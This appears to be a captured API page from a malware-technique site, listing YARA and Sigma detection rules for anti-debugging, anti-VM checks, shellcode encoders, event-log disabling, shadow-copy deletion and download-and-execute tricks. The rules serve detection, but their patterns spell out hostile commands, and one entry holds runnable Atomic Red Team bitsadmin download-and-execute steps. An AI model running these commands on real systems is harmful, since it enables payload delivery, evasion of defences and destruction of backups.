GET /api/detection_rules/?format=api&page=2
HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 159,
    "next": "https://unprotect.it/api/detection_rules/?format=api&page=3",
    "previous": "https://unprotect.it/api/detection_rules/?format=api",
    "results": [
        {
            "id": 69,
            "key": "detect_ollydbg_badformat_trick",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "Detect_OllyDbg_BadFormat_Trick",
            "rule": "rule Detect_OllyDBG_BadFormatTrick: AntiDebug {\r\n    meta: \r\n        description = \"Detect bad format not handled by Ollydbg\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"%s%s.exe\" fullword ascii\r\n    condition:   \r\n       $1\r\n}"
        },
        {
            "id": 134,
            "key": "hunting_rule_shikataganai",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "Hunting_Rule_ShikataGaNai",
            "rule": "// Mandiant's Yara rule to detect \"some of the current common permutations created by vanilla x86-SGN in Metasploit\"\r\nrule Hunting_Rule_ShikataGaNai\r\n{\r\n    meta:\r\n        author    = \"Steven Miller\"\r\n        company   = \"FireEye\"\r\n        reference = \"https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\"\r\n    strings:\r\n        $varInitializeAndXorCondition1_XorEAX = { B8 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }\r\n        $varInitializeAndXorCondition1_XorEBP = { BD ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }\r\n        $varInitializeAndXorCondition1_XorEBX = { BB ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }\r\n        $varInitializeAndXorCondition1_XorECX = { B9 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }\r\n        $varInitializeAndXorCondition1_XorEDI = { BF ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }\r\n        $varInitializeAndXorCondition1_XorEDX = { BA ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }\r\n        $varInitializeAndXorCondition2_XorEAX = { D9 74 24 F4 [0-30] B8 ?? ?? ?? ?? [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }\r\n        $varInitializeAndXorCondition2_XorEBP = { D9 74 24 F4 [0-30] BD ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }\r\n        $varInitializeAndXorCondition2_XorEBX = { D9 74 24 F4 [0-30] BB ?? ?? ?? ?? 
[0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }\r\n        $varInitializeAndXorCondition2_XorECX = { D9 74 24 F4 [0-30] B9 ?? ?? ?? ?? [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }\r\n        $varInitializeAndXorCondition2_XorEDI = { D9 74 24 F4 [0-30] BF ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }\r\n        $varInitializeAndXorCondition2_XorEDX = { D9 74 24 F4 [0-30] BA ?? ?? ?? ?? [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }\r\n    condition:\r\n        any of them\r\n}"
        },
        {
            "id": 159,
            "key": "impair-defenses-through-disable-windows-event-logging-was-detected",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "Impair Defenses Through Disable Windows Event Logging was Detected",
            "rule": "title: Impair Defenses Through Disable Windows Event Logging was Detected\r\ndescription: Detects the Impair Defenses tactic, through disable windows event logging technique\r\ndate : 04/12/2024\r\nauthor: 0x0d4y\r\nreferences:\r\n- https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\n- https://attack.mitre.org/techniques/T1562/002/\r\ntags:\r\n- attack.defense.evasion\r\n- attack.T1562.002\r\n- malware.generic\r\nlogsource:\r\n      category: process_creation, powershell_cmdlet, regitry_modification\r\n      product: windows\r\ndetection:\r\n    selection1:\r\n        EventID:\r\n            - '4688'\r\n            - '1'\r\n        NewProcessName:\r\n            - 'sc.exe'    \r\n        CommandLine|contains:\r\n            - '*eventlog start=disabled*'\r\n    selection2:\r\n        EventID:\r\n            - '4688'\r\n            - '1'\r\n        NewProcessName:\r\n            - 'auditpol.exe'\r\n        CommandLine|contains:\r\n            - '*/success:disable*'\r\n            - '*/clear*'\r\n            - '*/remove*'\r\n    selection3:\r\n        EventID:\r\n            - '4688'\r\n            - '1'\r\n        NewProcessName:\r\n            - 'wevtutil.exe'\r\n        CommandLine|contains:\r\n            - '*sl*'\r\n    selection4:\r\n        EventID:\r\n            - '4688'\r\n            - '1'\r\n        NewProcessName:\r\n            - 'reg.exe'\r\n        CommandLine|contains:\r\n            - '*add*SOFTWARE\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\*REG_DWORD /d 0*'\r\n    selection5:\r\n        EventID:\r\n            - '13'\r\n            - '4657'\r\n        TargetRegistry|contains:\r\n            - '*SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\*'\r\n        Details:\r\n            - 0\r\n            - 0x00000000\r\n    selection6:\r\n        EventID:\r\n            - '4104'\r\n        Message|contains:\r\n            - '*Set-Service -Name EventLog -Status Stopped*'\r\n      condition: selection1 or selection2 or selection3 or selection4 or selection5 or selection6\r\nlevel: critical"
        },
        {
            "id": 18,
            "key": "sigma_anti_vm",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_ANTI_VM",
            "rule": "title: AntiVM\r\nstatus: experimental\r\ndescription: Detect virtual environment \"VirtualBox|VMware|KVM|HVM\"  \r\nauthor: Joe Security\r\ndate: 2019-11-06\r\nid: 200020\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack: T1497\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*IlZpcnR1YWxCb3h8Vk13YXJlfEtWTXxIVk0i*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 119,
            "key": "sigma_hook_injection",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_Hook_Injection",
            "rule": "title: Hook Injection Detection\r\ndescription: Detects instances of hook injection in Windows\r\nauthor: Unprotect\r\nreferences:\r\n- https://en.wikipedia.org/wiki/Hooking\r\n- https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowhookexe\r\n- https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-unhookwindowshookex\r\n- https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callnexthookex\r\ntags:\r\n- attack.persistence\r\n- attack.t1179\r\n- malware.generic\r\n\r\n# Check for the presence of the SetWindowsHookEx function, which is often used to install hooks\r\n- 'SetWindowsHookExA'\r\n- 'SetWindowsHookExW'\r\n\r\n# Check for the presence of the UnhookWindowsHookEx function, which is often used to remove hooks\r\n- 'UnhookWindowsHookEx'\r\n\r\n# Check for the presence of the CallNextHookEx function, which is often used in hook functions\r\n- 'CallNextHookEx'\r\nThis rule uses string matching to look for the presence of specific functions that are commonly used in hook injection. If any of these functions are found in a scanned file, the rule will match and the code will be detected as potentially using hook injection. As with the YARA rule, this is just an example and more advanced rules may be needed for more robust detection."
        },
        {
            "id": 52,
            "key": "sigma_base64_download",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_base64_download",
            "rule": "title: Powershell download file from base64 url\r\nstatus: experimental\r\ndescription: Powershell download file from base64 url\r\nauthor: Joe Security\r\ndate: 2020-04-13\r\nid: 200072\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:\r\n          CommandLine:\r\n              - '*.downloadfile([system.text.encoding]::ascii.getstring([system.convert]::frombase64string(*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 61,
            "key": "sigma_bitsadmin",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_bitsadmin",
            "rule": "title: bitsadmin download and execute\r\nstatus: experimental\r\ndescription: Detect bitsadmin download and execute activity\r\nauthor: Joe Security\r\ndate: 2019-11-25\r\nid: 200031\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*bitsadmin /transfer*http*start %APPDATA%*'\r\n              - '*/transfer*http*.dll&& rundll32*'\r\n              - '*powershell*start-bitstransfer*start-process*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 55,
            "key": "sigma_bypass_applocker",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_bypass_applocker",
            "rule": "title: AppLocker Bypass via Regsvr32\r\nstatus: experimental\r\ndescription: AppLocker Bypass via Regsvr32\r\nauthor: Joe Security\r\ndate: 2020-03-04\r\nid: 200059\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*regsvr32*/s /u /n /i:http*scrobj*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 9,
            "key": "sigma_check_external_ip",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_check_external_ip",
            "rule": "title: Check external IP via Powershell\r\nstatus: experimental\r\ndescription: Check external IP via Powershell\r\nauthor: Joe Security\r\ndate: 2020-07-20\r\nid: 200081\r\nthreatname:\r\nbehaviorgroup: 8\r\nclassification: 6\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*powershell*api.ipify.org*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 43,
            "key": "sigma_decode_string_findstr",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_decode_string_findstr",
            "rule": "title: Decode strings from lnk via findstr.exe\r\nstatus: experimental\r\ndescription: uses findstr.exe to decode strings from lnk file\r\nauthor: Joe Security\r\ndate: 2019-11-11\r\nid: 200024\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*findstr /b /i *.lnk*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 33,
            "key": "sigma_delete_shadow_copy",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_delete_shadow_copy",
            "rule": "title: Delete Shadow Copy Via Powershell\r\nstatus: experimental\r\ndescription: Delete Shadow Copy Via Powershell\r\nauthor: Joe Security\r\ndate: 2019-10-25\r\nid: 200011\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack: T1490\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*powershell*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 54,
            "key": "sigma_detect_region",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_detect_region",
            "rule": "title: Geofenced Ru\r\nstatus: experimental\r\ndescription: Detect region and exit if matched with hardcoded country list Get-UICulture).Name -match \"CN|RO|RU|UA|BY \r\nauthor: Joe Security\r\ndate: 2019-11-06\r\nid: 200019\r\nthreatname:\r\nbehaviorgroup: 8\r\nclassification: 8\r\nmitreattack: T1241\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*R2V0LVVJQ3VsdHVyZSkuTmFtZSAtbWF0Y2ggIkNOfFJPfFJVfFVBfEJZI*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 51,
            "key": "sigma_hide_copy_melt",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_hide_copy_melt",
            "rule": "title: Hide copy and delete itself\r\nstatus: experimental\r\ndescription: Hide copy via attrib.exe and delete itself\r\nauthor: Joe Security\r\ndate: 2019-11-12\r\nid: 200025\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*attrib +s +h *timeout /t *del /f /q*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 59,
            "key": "sigma_hide_in_appdata",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_hide_in_appdata",
            "rule": "title: Copy itself to suspicious location via type command \r\nstatus: experimental\r\ndescription: Copy itself to suspicious location via type command\r\nauthor: Joe Security\r\ndate: 2020-02-13\r\nid: 200052\r\nthreatname:\r\nbehaviorgroup: 10\r\nclassification: 1\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*type*>*\\AppData*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 36,
            "key": "sigma_kill_process",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_kill_process",
            "rule": "title: Kill multiple process\r\nstatus: experimental\r\ndescription: Kill multiple process\r\nauthor: Joe Security\r\ndate: 2019-12-30\r\nid: 200039\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 29,
            "key": "sigma_lolbins",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_lolbins",
            "rule": "attack_technique: T1197\r\ndisplay_name: BITS Jobs\r\natomic_tests:\r\n- name: Bitsadmin Download (cmd)\r\n  auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421\r\n  description: |\r\n    This test simulates an adversary leveraging bitsadmin.exe to download\r\n    and execute a payload\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n    local_file:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: '%temp%\\bitsadmin1_flag.ps1'\r\n  executor:\r\n    command: |\r\n      bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}\r\n    cleanup_command: |\r\n      del #{local_file} >nul 2>&1\r\n    name: command_prompt\r\n- name: Bitsadmin Download (PowerShell)\r\n  auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc\r\n  description: |\r\n    This test simulates an adversary leveraging bitsadmin.exe to download\r\n    and execute a payload leveraging PowerShell\r\n\r\n    Upon execution you will find a github markdown file downloaded to the Temp directory\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n    local_file:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: $env:TEMP\\bitsadmin2_flag.ps1\r\n  executor:\r\n    command: |\r\n      Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}\r\n    cleanup_command: |\r\n      Remove-Item #{local_file} -ErrorAction Ignore\r\n    name: powershell\r\n- name: Persist, Download, & Execute\r\n  auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae\r\n  description: |\r\n    This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer and execute a payload in multiple steps.\r\n    Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsadmin to run an executable.\r\n    This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of \"svchost.exe\" and an Initiating Process Command Line of \"svchost.exe -k netsvcs -p -s BITS\"\r\n    This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    command_path:\r\n      description: Path of command to execute\r\n      type: path\r\n      default: C:\\Windows\\system32\\notepad.exe\r\n    bits_job_name:\r\n      description: Name of BITS job\r\n      type: string\r\n      default: AtomicBITS\r\n    local_file:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: '%temp%\\bitsadmin3_flag.ps1'\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n  executor:\r\n    command: |\r\n      bitsadmin.exe /create #{bits_job_name}\r\n      bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}\r\n      bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} \"\"\r\n      bitsadmin.exe /resume #{bits_job_name}\r\n      timeout 5\r\n      bitsadmin.exe /complete #{bits_job_name}\r\n    cleanup_command: |\r\n      del #{local_file} >nul 2>&1\r\n    name: command_prompt\r\n- name: Bits download using desktopimgdownldr.exe (cmd)\r\n  auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114\r\n  description: |\r\n    This test simulates using desktopimgdownldr.exe to download a malicious file\r\n    instead of a desktop or lockscreen background img. The process that actually makes \r\n    the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) \r\n    and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n    download_path:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: 'SYSTEMROOT=C:\\Windows\\Temp'\r\n    cleanup_path:\r\n      description: path to delete file as part of cleanup_command\r\n      type: path\r\n      default: C:\\Windows\\Temp\\Personalization\\LockScreenImage\r\n    cleanup_file:\r\n      description: file to remove as part of cleanup_command\r\n      type: string\r\n      default: \"*.md\"\r\n  executor:\r\n    command: |\r\n      set \"#{download_path}\" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr\r\n    cleanup_command: |\r\n      del #{cleanup_path}\\#{cleanup_file} >null 2>&1\r\n    name: command_prompt"
        },
        {
            "id": 44,
            "key": "sigma_onset_delay",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_onset_delay",
            "rule": "title: Powershell delayed execution via ping command\r\nstatus: experimental\r\ndescription: Powershell delayed execution via ping command\r\nauthor: Joe Security\r\ndate: 2020-03-17\r\nid: 200066\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*ping -n * & powershell.exe -executionpolicy bypass -noninteractive -windowstyle hidden*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 34,
            "key": "sigma_posh_pc_delete_volume_shadow_copies",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_posh_pc_delete_volume_shadow_copies",
            "rule": "title: Delete Volume Shadow Copies Via WMI With PowerShell\r\nid: 87df9ee1-5416-453a-8a08-e8d4a51e9ce1\r\ndescription: Shadow Copies deletion using operating systems utilities via PowerShell\r\nreferences:\r\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md\r\n    - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_shadow_copies_deletion.yml\r\n    - https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\r\ntags:\r\n    - attack.impact\r\n    - attack.t1490\r\nstatus: experimental\r\nauthor: frack113\r\ndate: 2021/06/03\r\nmodified: 2021/10/16\r\nlogsource:\r\n    product: windows\r\n    category: ps_classic_start\r\n    definition: fields have to be extract from event\r\ndetection:\r\n    selection_obj:\r\n        HostApplication|contains|all:\r\n            - 'Get-WmiObject'\r\n            - ' Win32_Shadowcopy'\r\n    selection_del:\r\n        HostApplication|contains:\r\n            - 'Delete()'\r\n            - 'Remove-WmiObject'\r\n    condition: selection_obj and selection_del\r\nfields:\r\n    - HostApplication\r\nfalsepositives:\r\n    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\r\nlevel: critical"
        },
        {
            "id": 37,
            "key": "sigma_proc_creation_win_shadow_copies_deletion",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_proc_creation_win_shadow_copies_deletion",
            "rule": "title: Shadow Copies Deletion Using Operating Systems Utilities\r\nid: c947b146-0abc-4c87-9c64-b17e9d7274a2\r\nstatus: stable\r\ndescription: Shadow Copies deletion using operating systems utilities\r\nauthor: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)\r\ndate: 2019/10/22\r\nmodified: 2021/10/24\r\nreferences:\r\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\r\n    - https://blog.talosintelligence.com/2017/05/wannacry.html\r\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/\r\n    - https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/\r\n    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100\r\n    - https://github.com/Neo23x0/Raccine#the-process\r\n    - https://github.com/Neo23x0/Raccine/blob/main/yara/gen_ransomware_command_lines.yar\r\n    - https://redcanary.com/blog/intelligence-insights-october-2021/\r\ntags:\r\n    - attack.defense_evasion\r\n    - attack.impact\r\n    - attack.t1070\r\n    - attack.t1490\r\nlogsource:\r\n    category: process_creation\r\n    product: windows\r\ndetection:\r\n    selection1:\r\n        Image|endswith:\r\n            - '\\powershell.exe'\r\n            - '\\wmic.exe'\r\n            - '\\vssadmin.exe'\r\n            - '\\diskshadow.exe'\r\n        CommandLine|contains|all:\r\n            - shadow  # will match \"delete shadows\" and \"shadowcopy delete\" and \"shadowstorage\"\r\n            - delete\r\n    selection2:\r\n        Image|endswith:\r\n            - '\\wbadmin.exe'\r\n        CommandLine|contains|all:\r\n            - delete\r\n            - catalog\r\n            - quiet # will match -quiet or /quiet\r\n    selection3:\r\n        Image|endswith: '\\vssadmin.exe'\r\n        
CommandLine|contains|all:\r\n            - resize\r\n            - shadowstorage\r\n            - unbounded\r\n    condition: 1 of selection*\r\nfields:\r\n    - CommandLine\r\n    - ParentCommandLine\r\nfalsepositives:\r\n    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\r\nlevel: critical"
        },
        {
            "id": 40,
            "key": "sigma_process_reimaging",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_process_reimaging",
            "rule": "action: global\r\ntitle: Defense evasion via process reimaging\r\nid: 7fa4f550-850e-4117-b543-428c86ebb849\r\ndescription: Detects process reimaging defense evasion technique\r\nstatus: experimental\r\nauthor: Alexey Balandin, oscd.community\r\nreferences:\r\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/\r\ntags:\r\n    - attack.defense_evasion\r\ndate: 2019/10/25\r\ndetection:\r\n    condition: all of them\r\nfalsepositives:\r\n    - unknown\r\nlevel: high\r\n---\r\nlogsource:\r\n    product: windows\r\n    service: sysmon\r\ndetection:\r\n    selection1:\r\n        category: process_creation\r\nfields:\r\n    - Image\r\n    - OriginalFileName\r\n    - ParentProcessGuid\r\nnew_fields:\r\n    - ImageFileName\r\n---\r\nlogsource:\r\n    product: windows\r\n    service: sysmon\r\ndetection:\r\n    selection2:\r\n        EventID: 11\r\nfields:\r\n    - ProcessGuid\r\n    - TargetFilename"
        },
        {
            "id": 48,
            "key": "sigma_spoofed_extension",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_spoofed_extension",
            "rule": "title: Execute DLL with spoofed extension\r\nstatus: experimental\r\ndescription: Execute DLL with spoofed extension\r\nauthor: Joe Security\r\ndate: 2020-03-24\r\nid: 200068\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*rundll32*.html,DllRegisterServer*'\r\n              - '*rundll32*.htm,DllRegisterServer*'\r\n              - '*rundll32*.txt,DllRegisterServer*'\r\n              - '*rundll32*.png,DllRegisterServer*'\r\n              - '*rundll32*.jpeg,DllRegisterServer*'\r\n              - '*rundll32*.jpg,DllRegisterServer*'\r\n              - '*regsvr32 c:\\programdata\\\\*.pdf*'\r\n              - '*regsvr32 c:\\programdata\\\\*.txt*'\r\n              - '*regsvr32 c:\\users\\public\\\\*.pdf*'\r\n              - '*regsvr32 c:\\users\\public\\\\*.txt*'\r\n              \r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 23,
            "key": "sigma_stop_service",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_stop_service",
            "rule": "title: Stop multiple services\r\nstatus: experimental\r\ndescription: Stop multiple services\r\nauthor: Joe Security\r\ndate: 2019-12-30\r\nid: 200040\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*net stop*& net stop*& net stop*& net stop*& net stop*& net stop*& net stop*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 24,
            "key": "sigma_uac_bypass",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_uac_bypass",
